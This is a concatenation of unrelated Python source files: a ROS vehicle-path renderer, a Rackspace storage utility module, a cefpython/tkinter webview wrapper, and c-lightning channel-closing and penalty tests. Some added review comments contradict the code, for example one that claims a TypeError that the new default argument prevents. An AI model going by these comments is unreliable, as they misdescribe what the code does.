            # drop the already-travelled prefix of the drawn path
            self.vehicle_path.points = self.vehicle_path.points[int(self.path_index/path_resolution):-1]

    def interpolate(self):
        # add intermediate steps for smooth motion
        # BUG FIX: iterate up to len-1 because every step reads point i+1.
        for i in range(0, len(self.vehicle_path) - 1):
            if self.vehicle_path[i][2] != self.vehicle_path[i+1][2]:
                # heading changes between the two points: nothing to add
                self.interpolated_path += []
            else:
                steps = int(np.linalg.norm(np.array(self.vehicle_path[i+1][0:2]) - np.array(self.vehicle_path[i][0:2]))/speed)
                xspan = [round(val, 2) for val in np.linspace(self.vehicle_path[i][0], self.vehicle_path[i+1][0], steps)]
                yspan = [round(val, 2) for val in np.linspace(self.vehicle_path[i][1], self.vehicle_path[i+1][1], steps)]
                # BUG FIX: repeat the heading once per step ([h] * steps); the
                # old scalar multiplication made zip() fail on a float.
                heading = [self.vehicle_path[i][2]] * steps
                self.interpolated_path += zip(xspan, yspan, heading)

    def draw_path(self, path, state="parking"):
        # draw the path of the vehicle on RViz
        # NOTE(review): ``state`` now defaults to "parking" because
        # vehicle_state() calls draw_path() with only the path — confirm
        # which state that caller actually intends.
        self.vehicle_path = path
        self.destination_marker.action = Marker.ADD
        self.path_marker.action = Marker.ADD
        self.motion = 1
        self.motion_start = time.time()
        self.interpolate()
        self.state = state
        for i in range(0, len(self.interpolated_path), path_resolution):
            # BUG FIX: build a fresh Point per sample; reusing a single Point
            # instance made every appended element alias the same object.
            pts = Point()
            pts.z = 0
            pts.x = self.interpolated_path[i][0]
            pts.y = self.interpolated_path[i][1]
            self.vehicle_path.points.append(pts)

    def clear_path(self):
        # clear the path of the vehicle and record how long the run took
        if self.state == "parking":
            parking_times.append(len(self.interpolated_path)/speed)
            self.state = "idle"
        elif self.state == "returning":
            returning_times.append(len(self.interpolated_path)/speed)
            self.clear()
            self.state = "clear"
        self.vehicle_path = []
        self.interpolated_path = []
        self.motion_start = 0
        self.motion = 0
        self.path_marker.action = Marker.DELETE
        self.destination_marker.action = Marker.DELETE

    def clear(self):
        # mark the vehicle marker for removal on the next publish
        self.vehicle_marker.action = Marker.DELETE

    def service_response(self):
        # current interpolated pose, used by the state services
        return self.interpolated_path[self.path_index]
def vehicle_state(data):
    # Callback for the "render_push" topic: add a new vehicle or update one.
    if data.flag == "ADD":
        a = Car(data.id, data.path, data.size)
        vehicles.append(a)
    elif data.flag == "UPDATE":
        # NOTE(review): Car.draw_path takes (path, state) but only the path
        # is passed here — this raises TypeError as written; confirm the
        # intended state. Also assumes data.id equals the vehicle's index
        # in ``vehicles`` — verify against the publisher.
        vehicles[data.id].draw_path(data.path)
def global_state(req):
    # Service handler stub for "global_state"; not implemented yet.
    pass
def local_state(req):
    # Service handler stub for "local_state"; not implemented yet.
    pass
def update():
    # Wire up the ROS interfaces, then block forever servicing callbacks.
    rospy.Subscriber("render_push", vehicle_update, vehicle_state)
    # Keep local references to the services while spinning.
    global_service = rospy.Service("global_state", state_global, global_state)
    local_service = rospy.Service("local_state", state_local, local_state)
    rospy.spin()
# have a custom message of line, cylinder marker, and a cube marker in each object of the class
# keep on updating the positions based on motion flag
def draw():
    # Render loop: refresh the shared clock and advance every moving car.
    # NOTE(review): this busy-waits at 100% CPU — a short sleep or a
    # rospy.Rate is probably intended; confirm before changing timing.
    global current_time
    while True:
        current_time[0] = time.time()
        for car in vehicles:
            if car.motion:
                car.move()
# Run the ROS-facing callback thread and the render loop side by side.
access = Thread(target=update)
render = Thread(target=draw)
access.start()
render.start()
|
utils.py | # Copyright (c) 2019 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
import math
# from os import listdir
# from os.path import isfile, join
import os
from glob import glob
from lxml import etree
from multiprocessing import Process
import subprocess
def read_ids_from_file(id_file):
    """Return the first whitespace-separated token of each non-blank line.

    :param id_file: path to a text file with one id (plus optional extra
                    columns) per line
    :return: list of id strings, in file order
    """
    with open(id_file, 'r') as fimage:
        list_ids = fimage.readlines()
    # NOTE: the ``with`` block closes the file; the old bare ``fimage.closed``
    # expression after it was a no-op and has been removed.
    ids = []
    for i in list_ids:
        if i and i.strip():
            uuid = i.split()[0]
            ids.append(uuid)
    return ids
def read_ids_with_hyps_file(id_file):
    """Parse lines of "<uuid> <hyp>" into a list of dict pairs.

    Blank lines are skipped. Lines with fewer than two tokens raise
    IndexError (unchanged behavior).

    :param id_file: path to a text file with two columns per line
    :return: list of {'uuid': ..., 'hyp': ...} dicts, in file order
    """
    with open(id_file, 'r') as fimage:
        list_ids = fimage.readlines()
    # NOTE: the old bare ``fimage.closed`` expression here was a no-op;
    # the ``with`` block already closes the file.
    ids = []
    for i in list_ids:
        if i and i.strip():
            tokens = i.split()
            ids.append({'uuid': tokens[0], 'hyp': tokens[1]})
    return ids
def load(filename):
    """Load a dictionary from a yaml file.

    Expects the file at *filename* to be valid YAML and returns the
    parsed content.

    :param filename: Name of the file
    :type filename: String
    :return: Loaded configuration
    :rtype: Dict
    """
    with open(filename, 'r') as stream:
        parsed = yaml.safe_load(stream)
        return parsed
def get_nfs_location(dir, volume_id):
    """Walk *dir* and return the directory containing a file named *volume_id*.

    :param dir: root directory to search (name kept for caller compatibility,
                although it shadows the ``dir`` builtin)
    :param volume_id: exact file name to look for
    :return: path of the directory holding the file, or None if not found
    """
    # os.walk yields file-name lists directly, so a membership test replaces
    # the old inner loop; unused ``fname`` and dead commented code removed.
    for root, _d_names, f_names in os.walk(dir):
        if volume_id in f_names:
            return root
    # Explicit None (the old code fell off the end implicitly).
    return None
# will round up to the nearest gb:
# base 1024
def convert_B_to_GB(bytes):
    """Convert a byte count to whole GiB, rounding up."""
    gib = float(1 << 30)  # same value as math.pow(1024, 3)
    return int(math.ceil(bytes / gib))
# Get macs from libvirt file. Needed for proper nic ordering on boot.
def get_macs_from_libvirt(full_path):
    """Return the MAC addresses listed in ``<full_path>/libvirt.xml``.

    :param full_path: directory containing the libvirt domain XML
    :return: list of MAC address strings, in document order
    """
    # print(...) is valid on both Python 2 and 3; the old print statement
    # was a SyntaxError under Python 3.
    print("libvirt in: " + full_path)
    tree = etree.parse(full_path + '/libvirt.xml')
    root = tree.getroot()
    interfaces = root.findall('./devices/interface/mac')
    macs = []
    for interface in interfaces:
        macs.append(interface.get('address'))
    # print(macs)
    return macs
def copy_file(full_path, file_name, new_name):
    """Sparse-copy ``full_path + file_name`` to ``full_path + new_name``.

    ``full_path`` must end with a path separator. Uses GNU
    ``cp --sparse=always`` so holes in disk images stay sparse.
    """
    # print(...) is valid on both Python 2 and 3; the old print statement
    # was a SyntaxError under Python 3.
    print("Copying " + full_path + file_name + " to " + full_path + new_name)
    # copy2(full_path + file_name, full_path + new_name)
    subprocess.call(["cp", "--sparse=always", full_path + file_name, full_path + new_name])
def start_copy_process(full_path, file_name, new_name):
    """Run copy_file in a background process (fire-and-forget)."""
    worker = Process(target=copy_file, args=(full_path, file_name, new_name))
    worker.start()
core.py | # -*- coding: utf-8 -*-
import os, sys, typing, threading
import tkinter as tk
from cefpython3 import cefpython as cef
from .assets import base_icon_file, base_js_file
class BrowserAPI:
    """
    BrowserAPI base class

    Subclass this to expose Python methods to the embedded webview.

    func execute_javascript: execute javascript code in webview
    func execute_function: execute defined javascript function in webview
    """

    def __init__(self, browser_window, browser):
        # Public handle back to the owning window; the cef browser is private.
        self.window: "BrowserWindow" = browser_window
        self.__browser = browser

    def execute_javascript(self, js_script):
        """
        execute javascript in webview

        :param js_script: javascript script to execute
        """
        self.__browser.ExecuteJavascript(js_script)

    def execute_function(self, name: str, *args):
        """
        execute defined javascript function in webview

        :param name: name of javascript function to execute
        :param args: arguments for javascript function
        """
        self.__browser.ExecuteFunction(name, *args)
class BrowserWindow(tk.Toplevel):
    """
    BrowserWindow class

    A tkinter Toplevel that hosts an embedded cefpython browser. The cef
    browser itself is created lazily on the first <Configure> event.

    :param url: url to show in webview. file, http url available
    :param js_api: javascript api for webview. inherits from 'BrowserAPI'
    :param title: webview window title
    :param icon: webview window title.
    :param width: width of window.
    :param height: height of window.
    :param x: x position of window (-1 centers horizontally).
    :param y: y position of window (-1 centers vertically).

    event on_load: function to trigger on webview page is loaded
    event on_close: function to trigger on webview window is closed
    """

    # When True, devtools open automatically after the browser is created.
    debug:bool = False

    class BrowserWindowHandler:
        # cef client handler forwarding load-state changes to the window.
        def __init__(self, browser_window):
            self.browser_window:BrowserWindow = browser_window

        def OnLoadingStateChange(self, browser, is_loading, **_):
            if not is_loading:
                if sys.platform == "win32":
                    # On Windows the geometry is applied only after the first
                    # load finishes (it is skipped in __init__, see below).
                    self.browser_window.geometry(f"{self.browser_window.wb_width}x{self.browser_window.wb_height}+{self.browser_window.wb_x}+{self.browser_window.wb_y}")
                self.browser_window.on_load(browser)

    def __init__(self, url:str, js_api_cls:typing.Union[BrowserAPI, typing.List[BrowserAPI]], title:str, icon:str, width:int, height:int, x:int, y:int):
        super().__init__()
        # Browser creation is deferred until __on_tk_configure fires.
        self.__is_cef_init = False
        self.__js_api_cls = js_api_cls
        self.icon = base_icon_file if icon is None else os.path.realpath(icon)
        # Normalize the url: pass http(s) through, resolve file paths.
        if url.startswith("http://") or url.startswith("https://"):
            self.url = url
        elif url.startswith("file://"):
            self.url = "file://" + os.path.realpath(url[7:])
        else:
            self.url = "file://" + os.path.realpath(url)
        self.title(title)
        self.iconphoto(False, tk.PhotoImage(file = self.icon))
        width, height = int(width), int(height)
        # -1 means "center on screen" for either coordinate.
        if x == -1:
            x = int((self.winfo_screenwidth() - width) / 2)
        else:
            x = int(x)
        if y == -1:
            y = int((self.winfo_screenheight() - height) / 2)
        else:
            y = int(y)
        self.wb_width, self.wb_height, self.wb_x, self.wb_y = width, height, x, y
        if not sys.platform == "win32":
            # On win32 geometry is applied later by BrowserWindowHandler.
            self.geometry(f"{width}x{height}+{x}+{y}")
        self.bind("<Configure>", self.__on_tk_configure)
        self.protocol("WM_DELETE_WINDOW", self.__on_tk_close)
        # Newest window goes first; __get_handle relies on this ordering.
        Application.windows.insert(0, self)

    def show_devtools(self):
        """
        show devtools
        """
        self.__browser.ShowDevTools()
        self.focus()

    def close_devtools(self):
        """
        close devtools
        """
        self.__browser.CloseDevTools()

    def register_js_api(self, js_api_cls:BrowserAPI):
        """
        register additional BrowserAPI class

        :param js_api_cls: BrowserAPI inherited api class
        """
        if js_api_cls is not None:
            # Instantiate and expose under the class name on the JS side.
            js_api = js_api_cls(self, self.__browser)
            self.register_object(js_api.__class__.__name__, js_api)

    def register_object(self, name, object):
        # Bind a Python object into the page's javascript namespace.
        self.__bindings.SetObject(name, object)
        self.__bindings.Rebind()

    def on_load(self, browser):
        # Override point: called after each page load completes.
        pass

    def on_close(self, browser):
        # Override point: called just before the window is destroyed.
        pass

    def __on_tk_configure(self, _):
        # First <Configure> event: create the cef browser as a child of
        # this Toplevel and start pumping the cef message loop.
        if not self.__is_cef_init:
            self.__is_cef_init = True
            winfo = cef.WindowInfo()
            if sys.platform == "win32":
                geometry = [ 0, 0, self.wb_width, self.wb_height ]
            else:
                geometry = [ 0, 0, self.winfo_width(), self.winfo_height() ]
            winfo.SetAsChild(self.__get_handle(), geometry)
            self.__browser = browser = cef.CreateBrowserSync(winfo, url = self.url)
            assert browser
            self.__bindings = bindings = cef.JavascriptBindings(bindToFrames = False, bindToPopups = False)
            browser.SetJavascriptBindings(bindings)
            # Accept a single api class or a list of them.
            if isinstance(self.__js_api_cls, list):
                for api_cls in self.__js_api_cls:
                    self.register_js_api(api_cls)
            else:
                self.register_js_api(self.__js_api_cls)
            browser.SetClientHandler(BrowserWindow.BrowserWindowHandler(self))
            if self.debug:
                self.show_devtools()
            # threading.Thread(target = self.__on_load).start()
            self.__cef_loop()

    def __on_tk_close(self):
        # Window-manager close: unregister, notify, tear down cef, and shut
        # the whole application down when this was the last window.
        Application.windows.remove(self)
        self.on_close(self.__browser)
        self.__browser.CloseBrowser(True)
        self.destroy()
        if len(Application.windows) == 0:
            self.master.destroy()

    def __get_handle(self):
        # Native window handle for cef. On macOS tkinter gives no usable id,
        # so look up the matching NSWindow via AppKit instead.
        if sys.platform == "darwin":
            from AppKit import NSApp
            import objc
            tk_windows = [ win for win in NSApp.windows() if str(win).startswith("<TKWindow: ") ][:-1]
            # Relies on Application.windows and NSApp.windows() staying in
            # the same relative order.
            mac_self = tk_windows[Application.windows.index(self)]
            return objc.pyobjc_id(mac_self.contentView())
        else:
            return self.winfo_id()

    def __cef_loop(self):
        # Pump the cef message loop off tkinter's after() timer (~200 Hz).
        # NOTE(review): the bare except silently stops the pump; it looks
        # intended to swallow the TclError raised after destroy() — confirm
        # before narrowing it.
        try:
            cef.MessageLoopWork()
            self.after(5, self.__cef_loop)
        except:
            pass
class Application(tk.Tk):
    """
    Base Application environment for webview

    :param settings: dictionary type of environment settings
        more details in "https://github.com/cztomczak/cefpython/blob/master/api/ApplicationSettings.md"
    """

    # All currently open BrowserWindow instances (newest first).
    windows:typing.List[BrowserWindow] = []

    def __init__(self, settings:dict = None, **kwargs):
        """
        :param settings: optional cef ApplicationSettings dict
        :param kwargs: forwarded to tkinter.Tk
        """
        super().__init__(**kwargs)
        self.withdraw()
        # BUG FIX: the default used to be a shared mutable ``{}``; it was
        # mutated below on macOS, leaking state across Application instances.
        if settings is None:
            settings = {}
        if sys.platform == "darwin":
            settings["external_message_pump"] = True
        sys.excepthook = cef.ExceptHook
        cef.Initialize(settings)

    def run(self, on_stop:object = None):
        """
        run webview environment

        :param on_stop: function called after the environment stopped
        """
        self.mainloop()
        cef.Shutdown()
        if on_stop:
            on_stop()
|
test_closing.py | from fixtures import * # noqa: F401,F403
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind):
    """Mutual close: negotiate a fee, confirm the close tx, forget the channel."""
    l1, l2 = node_factory.line_graph(2)
    chan = l1.get_channel_scid(l2)
    l1.pay(l2, 200000000)
    assert bitcoind.rpc.getmempoolinfo()['size'] == 0
    # Both peers should report a locked funding transaction.
    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
    billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
    bitcoind.generate_block(5)
    # Only wait for the channels to activate with DEVELOPER=1,
    # otherwise it's going to take too long because of the missing
    # --dev-broadcast-interval
    if DEVELOPER:
        wait_for(lambda: len(l1.getactivechannels()) == 2)
        wait_for(lambda: len(l2.getactivechannels()) == 2)
        billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
        # This may either be from a local_update or an announce, so just
        # check for the substring
        assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
    # This should return with an error, then close.
    with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
        l1.rpc.close(chan, False, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    # And should put closing into mempool.
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l2.daemon.wait_for_log('sendrawtx exit 0')
    # Both nodes should have disabled the channel in their view
    wait_for(lambda: len(l1.getactivechannels()) == 0)
    wait_for(lambda: len(l2.getactivechannels()) == 0)
    assert bitcoind.rpc.getmempoolinfo()['size'] == 1
    # Now grab the close transaction
    closetxid = only_one(bitcoind.rpc.getrawmempool(False))
    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    assert billboard == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi for tx:{}'.format(closetxid),
    ]
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
    l2.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
    # Make sure both nodes have grabbed their close tx funds
    assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
    assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
    # 100-block forget timer starts at confirmation (99 remaining here).
    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi for tx:{}'.format(closetxid),
        'ONCHAIN:Tracking mutual close transaction',
        'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
    ])
    bitcoind.generate_block(9)
    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi for tx:{}'.format(closetxid),
        'ONCHAIN:Tracking mutual close transaction',
        'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
    ])
    # Make sure both have forgotten about it
    bitcoind.generate_block(90)
    wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
    wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_while_disconnected(node_factory, bitcoind):
    """A close issued while the peer is offline completes after it reconnects."""
    l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
    chan = l1.get_channel_scid(l2)
    l1.pay(l2, 200000000)
    l2.stop()
    # The close should still be triggered afterwards.
    with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
        l1.rpc.close(chan, False, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    # Once l2 is back up, negotiation resumes and finishes.
    l2.start()
    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    # And should put closing into mempool.
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l2.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(101)
    wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
    wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
    """Test closing using peer ID and full channel ID
    """
    l1, l2 = node_factory.get_nodes(2)
    # Close by full channel ID.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)
    cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
    l2.rpc.close(cid)
    # Closing drops the connection on both sides.
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
    # Close by peer ID.
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l1.daemon.wait_for_log("Handed peer, entering loop")
    l2.fund_channel(l1, 10**6)
    pid = l1.info['id']
    l2.rpc.close(pid)
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(not DEVELOPER, "needs dev-rescan-outputs")
def test_closing_torture(node_factory, executor, bitcoind):
    """Repeatedly open a channel and close it simultaneously from both ends."""
    l1, l2 = node_factory.get_nodes(2)
    amount = 10**6
    # Before the fix was applied, 15 would often pass.
    # However, increasing the number of tries would
    # take longer in VALGRIND mode, triggering a CI
    # failure since the test does not print any
    # output.
    # On my laptop, VALGRIND is about 4x slower than native, hence
    # the approximations below:
    iterations = 50
    if VALGRIND:
        iterations //= 4
    if SLOW_MACHINE:
        iterations //= 2
    for i in range(iterations):
        # Reduce probability that spurious sendrawtx error will occur
        l1.rpc.dev_rescan_outputs()
        # Create a channel.
        l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
        l1.fund_channel(l2, amount)
        scid = l1.get_channel_scid(l2)
        # Get it confirmed.
        l1.bitcoin.generate_block(6)
        # Wait for it to go to CHANNELD_NORMAL
        l1.wait_channel_active(scid)
        l2.wait_channel_active(scid)
        # Start closers: can take a long time under valgrind!
        c1 = executor.submit(l1.rpc.close, l2.info['id'], False, 60)
        c2 = executor.submit(l2.rpc.close, l1.info['id'], False, 60)
        # Wait for close to finish
        c1.result(TIMEOUT)
        c2.result(TIMEOUT)
        # Both sides agree, so exactly one close tx hits the mempool.
        wait_for(lambda: len(bitcoind.rpc.getrawmempool(False)) == 1)
        # Get close confirmed
        l1.bitcoin.generate_block(100)
        wait_for(lambda: len(l1.rpc.listpeers()['peers']) == 0)
        wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
    """Close many channels in parallel against peers with varying feerates/amounts."""
    l1 = node_factory.get_node()
    # Default feerate = 15000/7500/1000
    # It will start at the second number, accepting anything above the first.
    feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
    amounts = [0, 545999, 546000]
    num_peers = len(feerates) * len(amounts)
    addr = l1.rpc.newaddr()['bech32']
    bitcoind.rpc.sendtoaddress(addr, 1)
    numfunds = len(l1.rpc.listfunds()['outputs'])
    bitcoind.generate_block(1)
    wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
    # Create them in a batch, for speed!
    peers = []
    for feerate in feerates:
        for amount in amounts:
            p = node_factory.get_node(feerates=feerate)
            p.feerate = feerate
            p.amount = amount
            l1.rpc.connect(p.info['id'], 'localhost', p.port)
            peers.append(p)
    for p in peers:
        p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
        # Technically, this is async to fundchannel returning.
        l1.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(6)
    # Now wait for them all to hit normal state, do payments
    l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
                            + ['to CHANNELD_NORMAL'] * num_peers)
    for p in peers:
        if p.amount != 0:
            l1.pay(p, 100000000)
    # Now close all channels
    # All closes occur in parallel, and on Travis,
    # ALL those lightningd are running on a single core,
    # so increase the timeout so that this test will pass
    # when valgrind is enabled.
    # (close timeout defaults to 30 as of this writing)
    closes = [executor.submit(l1.rpc.close, p.channel, False, 90) for p in peers]
    for c in closes:
        c.result(90)
    # close does *not* wait for the sendrawtransaction, so do that!
    # Note that since they disagree on the ideal fee, they may conflict
    # (first one in will win), so we cannot look at logs, we need to
    # wait for mempool.
    wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
    bitcoind.generate_block(1)
    for p in peers:
        p.daemon.wait_for_log(' to ONCHAIN')
        wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
    l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
    """Close negotiation survives disconnects around WIRE_CLOSING_SIGNED."""
    # Drop the connection before, during, and after sending closing_signed.
    disconnects = ['-WIRE_CLOSING_SIGNED',
                   '@WIRE_CLOSING_SIGNED',
                   '+WIRE_CLOSING_SIGNED']
    l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
    l2 = node_factory.get_node(may_reconnect=True)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    chan = l1.fund_channel(l2, 10**6)
    l1.pay(l2, 200000000)
    assert bitcoind.rpc.getmempoolinfo()['size'] == 0
    # This should return with an error, then close.
    with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
        l1.rpc.close(chan, False, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    # And should put closing into mempool (happens async, so
    # CLOSINGD_COMPLETE may come first).
    l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
    l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
    assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor):
    """Test penalty transaction with an incoming HTLC"""
    # We suppress each one after first commit; HTLC gets added not fulfilled.
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)
    # Now, this will get stuck due to l1 commit being disabled..
    t = executor.submit(l1.pay, l2, 100000000)
    assert len(l1.getactivechannels()) == 2
    assert len(l2.getactivechannels()) == 2
    # They should both have commitments blocked now.
    l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
    l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
    # Make sure l1 got l2's commitment to the HTLC, and sent to master.
    l1.daemon.wait_for_log('UPDATE WIRE_CHANNEL_GOT_COMMITSIG')
    # Take our snapshot: a (soon to be) revoked commitment tx with the HTLC.
    tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
    # Let them continue
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])
    # Should fulfill.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    # Payment should now complete.
    t.result(timeout=10)
    # Now we really mess things up: broadcast the revoked commitment!
    bitcoind.rpc.sendrawtransaction(tx)
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log(' to ONCHAIN')
    # FIXME: l1 should try to stumble along!
    wait_for(lambda: len(l2.getactivechannels()) == 0)
    # l2 should spend all of the outputs (except to-us).
    # Could happen in any order, depending on commitment tx.
    needle = l2.daemon.logsearch_start
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
    l2.daemon.logsearch_start = needle
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
    # FIXME: test HTLC tx race!
    # 100 blocks later, all resolved.
    bitcoind.generate_block(100)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    outputs = l2.rpc.listfunds()['outputs']
    assert [o['status'] for o in outputs] == ['confirmed'] * 2
    # Allow some lossage for fees.
    assert sum(o['value'] for o in outputs) < 10**6
    assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor):
    """Test penalty transaction with an outgoing HTLC.

    l1 is driven to broadcast a revoked (old) commitment that still
    contains an outgoing HTLC; l2 must sweep every output of it with
    OUR_PENALTY_TX transactions and end up with all the funds.
    """
    # First we need to get funds to l2, so suppress after second.
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # Move some across to l2.
    l1.pay(l2, 200000000)

    # The '*3' disconnect triggers on the third commitment: it must not
    # have fired during the funding payment above.
    assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
    assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')

    # Now, this will get stuck due to l1 commit being disabled..
    t = executor.submit(l2.pay, l1, 100000000)

    # Make sure we get signature from them.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')

    # They should both have commitments blocked now.
    l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
    l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')

    # Make sure both sides got revoke_and_ack for that commitment.
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Take our snapshot.
    tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']

    # Let them continue
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])

    # Thread should complete.
    t.result(timeout=10)

    # Make sure both sides got revoke_and_ack for final.
